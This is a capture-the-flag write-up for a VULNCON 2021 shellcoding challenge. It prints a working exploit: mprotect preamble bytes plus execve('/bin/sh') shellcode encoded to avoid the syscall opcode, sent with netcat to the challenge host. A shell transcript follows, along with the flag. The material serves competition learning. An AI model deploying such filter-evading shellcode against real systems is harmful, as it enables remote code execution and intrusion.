Tags: pwntools shellcraft 

Rating:

This challenge is a basic 'execute-your-shellcode' challenge with the following constraints:

1. The buffer containing the shellcode is set to `execute` with `mprotect`. This frustrates
polymorphic payloads.
2. Payloads containing the `0x0f05` sequence is not permitted. This corresponds to `syscall`.

The following exploit re-uses `mprotect` in the GOT to set all permissions on the shellcode buffer
and then executes a standard encoded `execve("/bin/sh")` shellcode.

```bash
cat exploit.sh
#!/bin/bash

# Set mprotect rwx preamble.
# mov rdi, 0x69420000
# mov rsi, 0x100
# mov rdx, 0x7
# mov r8, 0x4010f0
# call r8

(python -c 'import sys;from pwn import *;x=b"\x48\xC7\xC7\x00\x00\x42\x69\x48\xC7\xC6\x00\x01\x00\x00\x48\xC7\xC2\x07\x00\x00\x00\x49\xC7\xC0\xF0\x10\x40\x00\x41\xFF\xD0" + encode(asm(pwnlib.shellcraft.amd64.linux.sh(), arch="amd64"), avoid=b"\x0f\x05");sys.stdout.buffer.write(x)'; cat -) | nc 35.228.15.118 1338
```

Executing the exploit gives us a shell and allows us to get the flag:

```console
$ bash exploit.sh
Are you really good at shellcoding Lets try :
id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
ls -la
total 64
drwxr-xr-x 1 root root 4096 Dec 4 10:09 .
drwxr-xr-x 1 root root 4096 Nov 29 05:47 ..
-rw-r--r-- 1 root root 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 root root 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 root root 807 Feb 25 2020 .profile
-rwxr-xr-x 1 root root 17128 Nov 26 15:51 chall
-rw-rw-r-- 1 root root 48 Dec 4 06:27 flag
-rwxr-xr-x 1 root root 18744 Nov 29 11:11 ynetd
cat flag
VULNCON{Gu355_u_d0nt_n33d_th3_5y5c4ll_aft3r4ll}
```

**Flag:** `VULNCON{Gu355_u_d0nt_n33d_th3_5y5c4ll_aft3r4ll}`

Original writeup (https://nandynarwhals.org/vulncon-ctf-2021/#pwnmore-than-shellcoding).